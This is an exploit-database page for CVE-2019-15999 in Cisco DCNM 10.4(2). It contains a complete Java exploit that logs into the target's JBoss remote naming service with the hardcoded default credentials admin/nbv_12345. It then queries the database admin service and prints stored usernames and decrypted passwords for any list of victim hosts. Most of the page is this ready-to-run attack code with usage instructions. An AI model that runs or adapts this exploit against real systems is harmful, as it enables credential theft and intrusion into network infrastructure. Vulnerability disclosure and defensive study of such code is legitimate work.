Cisco DCNM JBoss 10.4 - Credential Leakage

vendor:

DCNM

by:

Harrison Neal

6.3

CVSS

MEDIUM

Credential Leakage

287

CWE

Product Name: DCNM

Affected Version From: 10.4(2)

Affected Version To: 10.4(2)

Patch Exists: YES

Related CWE: CVE-2019-15999

CPE: a:cisco:dcnm:10.4:2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2020

Cisco DCNM JBoss 10.4 – Credential Leakage

This exploit allows an attacker to gain access to credentials stored in Cisco DCNM JBoss 10.4. The attacker needs to have a few .jars from a copy of Cisco DCNM to compile and run this code. The attacker can then use the code to access the credentials stored in the system. The code can be compiled by matching the file path ${package}/${class}.java, e.g., com/whatdidibreak/dcnm_expl/Main.java. The attacker can then use the command java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...] to gain access to the credentials.

Mitigation:

The user should ensure that the system is updated with the latest security patches and should use strong passwords to protect the system.

Source

Exploit-DB raw data:

# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999

# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java

# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]

package com.whatdidibreak.dcnm_expl;

import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;

import java.util.Properties;

import javax.naming.Context;
import javax.naming.InitialContext;

public class Main {

    public static void main(String[] args) throws Throwable {
        for (String target : args) {
            System.out.println("Target: " + target);

            Properties jndiProps = new Properties();
            jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
            jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
            jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
            jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
            jndiProps.put("jboss.naming.client.ejb.context", true);

            Context ctx = new InitialContext(jndiProps);

            DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");

            for (DBRowDO row : i.getServerProperties(null).getRows()) {
                String propName = row.getEntry()[0];
                String propValue = row.getEntry()[1];

                if (propValue.isEmpty()) {
                    continue;
                }

                if (propName.contains("user")) {
                    System.out.println(propName + " = " + propValue);
                } else if (propName.contains("pass")) {
                    System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
                }
            }

            System.out.println();
        }
    }
}